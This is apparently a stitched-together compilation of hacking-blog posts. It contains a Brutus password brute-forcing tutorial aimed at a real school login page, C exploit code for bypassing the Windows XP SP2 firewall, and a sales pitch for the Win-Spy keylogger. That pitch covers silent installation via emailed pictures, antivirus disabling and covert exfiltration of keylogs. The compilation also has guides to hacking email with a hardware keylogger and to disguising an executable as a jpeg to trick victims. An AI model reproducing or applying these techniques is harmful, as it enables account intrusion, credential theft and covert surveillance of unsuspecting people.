Brutus Tutorial on How to use it

Written by: ALEX
I, The alex, take no responsibilty for what you do with the information
that I am providing for you. This information is for educational purposes only.

Chapter 1: Introduction to Brutus.

1.What is Brutus?

2.What can I do with it?

3 Where can I download Brutus?

4.Where can I find a good password list?

Chapter Two: Let's Get Crackin'.

1.HTTP Form.

2.FTP.

3.POP3

4.Telnet.

5.SMB (Netbios)

6.Netbus

7.Custom.

Chapter Three: Wrapping up.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1.Contact Information.

Chapter One.

==What is Brutus?==

Brutus is a well known password brute forcing program.

==What can I do with it?==

With Brutus, you can brute force passwords for HTTP, FTP, POP3, Telnet, SMB (Netbios), Netbus, and they also have a
"Custom" option so you can specify your own settings.

==Where can I download Brutus?==
You can find Brutus at it's webpage www.hoobie.net/brutus
You can also find it at GluTuk's site www.spartandownloads.2ys.com

==Where can I find a good password list to use with Brutus?==
Pretty much, the only password list you will ever need
and has 4.9 million passwords. Here are a link where you can download it.

Part 1.
http://area51archives.com/files/pass_list.rar

Part 2
http://area51archives.com/files/pass_list.rar

Chapter Two: Let's Get Crackin'.

Note: You can use a proxy for each cracking method.

==HTTP Form==

This is the option you would use if you want to crack into a website that has a field for a username and a pass, like
this one.

http://www.westbranch.k12.oh.us/staff/controls.asp

I will use this site for the rest ov this section as well.

First thing you wanna do is open Brutus, and select http form. Then click the modify sequence button. Once there we put
the above link into the Target form field, then click Learn Form Settings
From here, you click the field name that is for the username, in this case it is userid, once you have selected it,
click the username button that is shown above the cookie information. That tells brutus that that field is for the username.
Then you select the password field and click the password button, then click accept. Next, in the HTML Response field you
need to fill that in with the response you get when you try to enter a password into your site. In this case the response is
"You have entered a wrong Password or username." For this target we will put that into the Primary response field Once this
is done, we click ok, add the IP into the Target Field and start our crack.

==FTP==

For cracking an FTP server, the default settings should remain how they are, I usually make sure that the "Try to stay
connected for unlimited attempts" box is ticked.Thats up to you, once you have selected your options, enter the IP and
being the crack.

==POP3==

This is pretty much the same as FTP cracking as far as, the default settings should work for you. Once again, I like to
use the "Try to stay connected for unlimited attempts" option.

==Telnet==

Seems as if I'm repeating myself, but once again, the default settings should werk for you.

==SMB (Netbios)==

If you happen to find yourself a target that has the netbios port open (139) and has sharing enabled, but needs a
password, this is what you would use. Once again, default settings should werk.

==Netbus==

Netbus is a popular trojan that sometimes, you might find a server that needs a password to connect.
This option is used for, cracking a password protected Netbus server.

==Custom==

This is what you would use to set up a crack for anything else that you could think ov.You need to find out what you need
to put in each field once you click "Define sequence" Those options will vary from target to target.

Bypassing Windows-XP Firewall

There is a technique using which we can bypass windows-xp service pack-2 firewall.
This techniques is nothing but the vulnerability found in windows-xp sp2 firewall.
This is explained here in detail with exploit code.

Windows XP Firewall Bypassing (Registry Based) :- Microsoft Windows XP SP2 comes bundled with a Firewall. Direct access to Firewall's registry keys allow local attackers to bypass the Firewall blocking list and allow malicious program to connect the network.

Credit :-
The information has been provided by Mark Kica.
The original article can be found at: http://taekwondo-itf.szm.sk/bugg.zipVulnerable Systems :-
* Microsoft Windows XP SP2
Windows XP SP2 Firewall has list of allowed program in registry which are not properly protected from modification by a malicious local attacker.
If an attacker adds a new key to the registry address of HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List, the attacker can enable his malware or Trojan to connect to the Internet without the Firewall triggering a warning.
Proof of Concept :-
Launch the regedit.exe program and access the keys found under the following path:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List
Add an entry key such as this one:
Name: C:\chat.exe
Value: C:\chat.exe:*:Enabled:chat

Exploit :-
#include
#include
#include
#include
#include "Shlwapi.h" int main( int argc, char *argv [] )
{
char buffer[1024];
char filename[1024];
HKEY hKey;
int i;
GetModuleFileName(NULL, filename, 1024);
strcpy(buffer, filename);
strcat(buffer, ":*:Enabled:");
strcat(buffer, "bugg");
RegOpenKeyEx(
HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Services" "\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile" "\\AuthorizedApplications\\List",
0,
KEY_ALL_ACCESS,
&hKey);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

int temp, sockfd, new_fd, fd_size;
struct sockaddr_in remote_addr;
fprintf(stdout, "Simple server example with Anti SP2 firewall trick \n");
fprintf(stdout, " This is not trojan \n");
fprintf(stdout, " Opened port is :2001 \n");
fprintf(stdout, "author:Mark Kica student of Technical University Kosice\n");
fprintf(stdout, "Dedicated to Katka H. from Levoca \n");
sleep(3);
if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
return 0;

for (; ; )
{
RegDeleteValue(hKey, filename);
fd_size = sizeof(struct sockaddr_in);
if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
{
perror("accept");
continue;
}
temp = send(new_fd, "Hello World\r\n", strlen("Hello World\r\n"), 0);
fprintf(stdout, "Sended: Hello World\r\n");
temp = recv(new_fd, buffer, 1024, 0);
buffer[temp] = '\0';
fprintf(stdout, "Recieved: %s\r\n", buffer);
ezclose_socket(new_fd);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));
if (!strcmp(buffer, "quit"))
break;
}
ezsocket_exit();
return 0;
}
/* EoF */

Hack Email id PAssword Using Winspy keylogger

Win-Spy Monitor Keylogger Features:

1) What is Win Spy Software?

WinSpy is a Complete Stealth Monitoring Software that can both monitor your Local PC and Remote PC. Win Spy Software operates in stealth mode. Win-Spy will not show in Add/Remove Programs, Windows Start, Taskbar, Task Manager, Processes or in Program Files Folder. Win-Spy can either be used for you Home or Office.

Win-Spy is a complete Local and Remote monitoring package that includes everything below for one low price: Breakdown is as follows:

Local PC Monitoring comes with:

Screen Capture
WebCam Shots
Keylogger
Emailer for Keylog, Screen Capture and Reports
Keylog Alert with Emailer 

Reports - WebSites Visited Summary
- Websites Visited Detail
- Time On Internet
- Dual Side Conversations
- Unauthorized Login Attempt

Folder Hider
Clear All Tracks Utility
Secure File Deletion Utility
Lost or Stolen PC Tracker
Anti-Spy Disable / Destroy
Anti Virus Stealth Technology
Web-Cam via Internet Explorer
Remote Deployment/Monitoring
Suspend on Idel
Monitor across networks
WebAccess to all screen shots and reports


Remote PC Monitoring comes with:

Screen Capture
WebCam Shots

Reports - Keylogger
- Time on Net
- Websites Visited Summary
- Websites Visited Detail
- Dual Side Conversations

Emailer for Keylog, Screen Capture and Reports
Streaming Web-Cam (View / Record)
Remote Mic (Record / Listen)
Remote PC file Browser and FTP
Remote PC file Download / Uploader / Execute / Delete
Remote PC Shutdown / Log Off
Send Message to Remote PC
Anti-Spy Disable / Destroy
Anti Virus Stealth Technology
3 remote file deployment - combine, exe and excel
3 ways to obtain remote information - email, direct connect, ftp
3 methods to for remote uninstall - auto, direct connect, via uninstall file
Monitor up to 5 remote PC with 29.95 version
Suspend on Idel
Centralized Monitoring
Save information across network
Auto Config XP Firewall
WebAccess


2) How does Win Spy Software work?

Win Spy Software accomplishes two tasks in monitoring your computer. Spy Software
a) It captures screen shots of the computer.Spy Software
b) It captures all keys typed on the keyboard.
c) It captures all chat conversations.


3) How do I Install and run Win Spy Software?

Run the Win Spy Software Setup.exe file. You will be prompted to enter a username and password. Enter any Username and Password. You will use this Username and Password to Login into Win Spy Software. Note that username and password are case sensitive. Restart your computer. Press Control and SHIFT and F12 keys to login.


4) How do I Uninstall Win Spy Software?

You will have to enter your username and password to uninstall Win Spy Software.Spy Software
Users will not be able to uninstall Win Spy Software without a username and password.Spy Software
Press CONTROL - SHIFT - F12 keys, at login dialog enter your username and password press the uninstall button.


5) How do I access Win Spy Software in windows?

To login into Win Spy Software you will have to use the CONTROL - SHIFT - F12 keys.


6) Does Win Spy Software start automatically when windows start?

Yes, Win Spy Software automatically starts every time you start windows.


7) Will users know if Win Spy Software is running?

Win Spy Software will not appear in Add/Remove Programs, Windows Start, Taskbar, Task Manager, Processes or in Program Files Folder.on the task manager or windows toolbar.


8) Can users uninstall Win Spy Software?

You will have to enter your username and password to uninstall Win Spy Software.pare
Users will not be able to uninstall Win Spy Software without a username and password.Sp
Press CONTROL - SHIFT - F12 keys, at login dialog enter your username and password press the uninstall button.


9) Can users stop Win Spy Software from running?

No, Win Spy Software does not appear on the task manager. Users will not be able to stop Win Spy Software program.


10) Can I save Screen Capture and Key Recorder files across the network?

Yes, Win Spy Software allows users to specify location to store the ScreenCapture and Key Recorder files.


11) Can Win Spy Software email me the Key Recorder file?

Win Spy Software has the option to mail the Key Recorder file to any e-mail address that supports SMTP mail (example: Yahoo). The file is emailed whenever the user connects to the internet.


12) Can Can win-spy email me the keylog file when certain keywords are found?

Yes, win spy has a Keyword Alerter that will secretly email the keylog to me, when keywords or phrase I specify are found in the keylog.


13) Does Win-Spy uses outlook or other email programs to send emails?

Win Spy works independetly. Win spy does not depend on outlook or any other email programs to send mail.


14) Is Win Spy dependent on PC email address? 

No, Win Spy works independetly. Win spy does not depend on PC email address .


15) Is Win Spy dependent on PC email program? 

No, Win Spy works independetly. Win spy does not depend on PC email program/software.


16) Will sent mails show in outbox? 

No, Win Spy works independetly. Sent mail will not show in outboox.


17) What email provider should I use to RECEIVE my keylog? 

Use any email provider that supports SMTP mail. Try Yahoo, it might work depending on your region. Do not use AOL or Hotmail to receive keylog file. AOL and Hotmail does not support SMTP mail. Note, it does not matter if the PC you are monitoring uses AOL, what matters is where you want to receive your email.


18) Can I Hide any folder in windows using Win Spy Software? 

Yes, with Win Spy Software you may select any window folders to hide. Win Spy Software has the option to disable windows “View Folder Option” making hidden folders totally un-access able by users.


19) What is Win Spy WebCam?

Win Spy webcam when turned on will allow you to access your PC webcam via the internet using IE.
So if you were at work, you can use your work PC to monitor what is going on at home?
Just turn your browser on and enter your IP home address. You will not need to install anything on your work PC.for webcam to work. Pictures are in realtime.


20) What is Win Spy Clear Tracks?

Win Spy clear tracks is a utility that allows you to quickly clear Internet and Windows tracks on your computer with a click of a button.

Clear Tracks Clears the following:
Internet Cookies
Internet History
Internet AutoComplete
Internet Temporary Files
Internet Index files.
Windows Recent Document
Windows Search History
Windows Run History
Windows Temp Files
WindowsApplication Recent Cache
Windows Recycle Bin


21) What is Win Spy Secure File Folder Deletion/Eradicator?

Secure File Deletion allows you to securely delete a file or folder. Files/folders deleted are gone forever.
Win Spy’s Secure Deletion rewrites to the file and deletes the files 25 times.
Win Spy’s Secure Deletion exceeds US Department of Defense standards for file deletion(DOD 5220.22).


22) What is Win Spy PC Tracker?

In an event your PC is Lost or Stolen. When the user of your PC connects online.
Win-Spy PC Tracker will secretly email you your location to you.

Location Info includes:
Host IP:
Computer Name:
Computer Time:
Server IP:
Server Name:
Server Time:
OS Type:
OS ID:
RegisteredOrganization:
RegisteredOwner:
Computer ID:
IP Configuration Info:
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address
Subnet Mask
Default Gateway


23) How do I locate my PC with info above?

1) go to http://www.arin.net/whois/
2) enter this IP address to get contact information for server or router which was used to connect to the Internet;
3) contact management of this server and provide them with connection time and IP address.
The management can check records in server's log and determine the name and street address of the person who is using the computer.
In most cases the management don't reveal such kind of information to a private party so police assistance is required.


24) What is Win Spy Anti-Spy?

Win Spy Anti Spyware will actively and continously disable or destroy any attempts by user to install or run anti spyware on your PC. This option can be turned on or off in Tools / Misc.


25) Can Win Spy be detected by Anti Spy software?

Win Spy has 2 technologies built in to avoid detection by Anti Spywares.
1) Win Spy's Anti Spy when turned on will actively and seek and destroy Anti-Spy Softwares.
2) Win Spy incorporates random filenames for most of its program files.


26) What Reports can Win-Spy produce?

1) Websites Visited Summary Report - by username and time
2) Websites Visited Detail Report - by username and time
3) Hours Spent On Internet - by username and date
4) Login or attempts by username
5) Chat room conversations
6) Keylog or anything typed on PC


27) Does Win-Spy record chat room conversations?

Yes, Win-Spy will capture Screen Shots and anything Typed in chatrooms.


28) Will Win-Spy work across firewalls?

Yes, Win Spy will work across firewalls. Important, See below.


29) Will Win-Spy penetrate/hack through Firewalls?

No, Noticed the way we asked the question above.
Most vendors would stop at with the question above, making you believe their product would penetrate firewalls. There are currently no over the counter product that would penetrate firewalls. If there was, corporate America would be broke. If anyone is claiming to be able to do this, ask them for a evaluation copy.


30) Can Win-Spy Auto Configure XP Firewall?

Yes, you can set win-spy to automatically configure XP firewall settings for you.


31) What is Win Spy Remote?

Win-Spy Remote you will be able to monitor activities on the Remote PC in real-time.
You will be able to:

1) View Screen Captures
2) View Keylog file
3) View ChatRoom Conversations report
4) ViewTime Spent Online report
5) View Websites Visited report
6) Browse all files and folders on remote PC.
7) Run, Delete files and folders on remote PC.
8) Upload and Download files to/from remote PC.
9) View remote PC Webcam in realtime/streaming.
10) Record remote PC sound (mic) conversations.
11) Email remote PC reports to my PC.
12) FTP remote PC reports and screen shots to my PC.


32) How does remote Install work?

Use Remote Install and create a remote file.
Send remote file to your remote PC through email.
When the user clicks on the file it would silently install Win-Spy.
If a picture is included then the user would see the picture and not be aware that win-spy is being installed.
If no picture is included then when user clicks on the file it would appear as nothing has happened.


33) How do I Monitor a Remote PC?

Step 1 - Create Remote File using Remote Install.
Step 2 - Send Remote File to your Remote PC using your email.
(When remote user clicks on remote file win-spy will silently install.)
Step 3 - Use Remote Viewer to view content/monitor remote PC.


34) How do I create a Remote Install File? 

You would use Win Spy Software’s Remote Install File creator under Remote to create the remote install file.


35) What information will I receive from the remote PC?

Win-Spy Remote you will be able to monitor activities on the Remote PC in real-time.
You will be able to:

1) View Screen Captures
2) View Keylog file
3) View ChatRoom Conversations report
4) ViewTime Spent Online report
5) View Websites Visited report
6) View remote PC Webcam in realtime/streaming.
7) Record remote PC sound (mic) conversations.


36) How do I obtain the information from the remote PC?

Only Win-Spy gives you 3 methods of retriveing data from remote PC..
1. Connect to remote PC and retrive data/reports
2. Get remote PC E-mail reports directly to you
3. FTP remote PC’s reports/screen shots to FTP server


37) What is emailed from remote system that you are monitoring?

ScreenShots, Keylog, WebsitesVisited, TimeOnline and ChatConversations Reports are emailed.


38) What is FTP from remote system that you are monitoring?

All reports and screen shots are ftp.


39) Will Win-Spy remote work with Dial-up?

Yes, Win-Spy will work with dial up or high speed connections.


40) How would you know that the other user is on line?

Win-Spy will inform you with popup, like msn messenger program.


41) Will Win-Spy work with Dynamic IP on remote PC?

Yes, Win-Spy manages the IP. Works like the same concept as msn messenger. You will not need the remote PC's IP to connect to it.


42) What browsers are compatible with Win Spy?

Win Spy is compatible with Internet Explorer 5.5 and above.


43) What is the purpose of Seek and Destroy Anti-Spyware?

Win Spy seek and destroy will prevent users from installing or running any Anti-Spy software. The purpose of this is so that users will not be able to remove Win-Spy. After all, what is the point of having a monitoring system if your child can easily install an Anti-Spy software and remove Win-Spy.


44) What dual-side chatrooms conversations will win-spy montor?

Win-Spy Records Dual Side Chat On the following Chat Rooms."
Yahoo version 6.0.0.1750
ICQ version 2003b Build 3916
AIM version 5.1.3036
MSN version 7.0.0425
Trillian version 0.74 w/patch 1





Download Winspy Keylogger (Originale provider price : $39)

If u want Winspy kelogger for only $15 then purchase here 

Buy Now

and contact me here for software .

 I will send you software within 1 hr.

How to Hack an Email using Hardware Keylogger

http://realhackingtips.blogspot.com/2010/07/best-myspace-facebook-hacking-software.htmlDid you know that keyloggers are the simplest way to hack an email password?. Today I’ll be giving you a detailed information on hardware keyloggers and their use. I will also teach how to hack an email using hardware keylogger.
More information about Keylogger click here

A software keylogger (or simple keylogger) is a stealth computer program that captures every keystroke entered through the keyboard.

Now I’ll tell you what is a hardware keylogger and how it can be used for hacking an email.

Hardware Keyloggers are used for keystroke logging, a method of capturing and recording computer user keystrokes. They plug in between a computer keyboard and a computer and log all keyboard activity to an internal memory. They are designed to work with PS/2 keyboards, and more recently with USB keyboards. A hardware keylogger appears simply as a USB pendrive (thumb drive) or any other computer peripheral so that the victims can never doubt that it is a keylogger. So by looking at it’s appearence it is not possible to identify it as a keylogger. Here are some of the images of hardware keyloggers for your convenience.

So by looking at the above images we can come to know that hardware keyloggers look just like any USB or PS/2 device. So it is very hard to identify it as a keylogger.


Insatalling a Hardware Keylogger to Hack the Email Password

The hardware keylogger must be installed between the keyboard plug and the USB or PS/2 port socket. That is you have to just plug in the keylogger to your keyboard’s plug (PS/2 or USB) and then plug it to the PC socket. The following image shows how the keylogger is installed.

Once you install the hardware keylogger as shown in the above two images the keylogger starts recording each and every keystroke of the keyboard including email passwords and other confidential information. The hardware keylogger has an inbuilt memory in which the logs are stored.

For Software Download....Click here.

Hide exe file in jpeg image

Follow These Steps


1. First Step, Create a new folder and please check that "Show hidden files" is checked and "hide extensions for known file types" is unchecked in folder options.

2. Copy your exe file source in that folder for example called first.exe.

3. Now you have to rename this first.exe file to whatever you want. Here suppose you are renaming it to second.jpeg. When you trying to renaming it windows will warn you like if you really want to change this extension from exe to jpeg, then click on YES.

4. Now create one shortcut of secong.jpeg in same folder and renaming shortcut to whatever you want suppose you are renaming it to third.exe.

5. Now right click on third.exe and go to properties, Here you have to do some changes mentioned below.

6. Delete all things which are present in start in field and leave it empty.

7. Now in this step you have to write the path to open other files second.jpeg like this: C:\WINDOWS\system32\cmd.exe /c second.jpeg

8. The last field, c second.jpeg is always the name of the first file. If you called the first file demo.avi then you you have to write
C:\WINDOWS\system32\cmd.exe /c demo.avi

9. Now here what you are doing is So what you are doing is when someone clicks on third.jpeg, a command will execute the other file second.jpeg and the source will run.

10. Now right click on third.jpeg, go to properties and then you will see one option to change your icon. Click this and then a new window will open. You have to write this : %SystemRoot%\system32\SHELL32.dll and then press OK.

11. All things are done but you have to remember two things in your mind that these 2 files must be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.

ask if u have any Question in comment box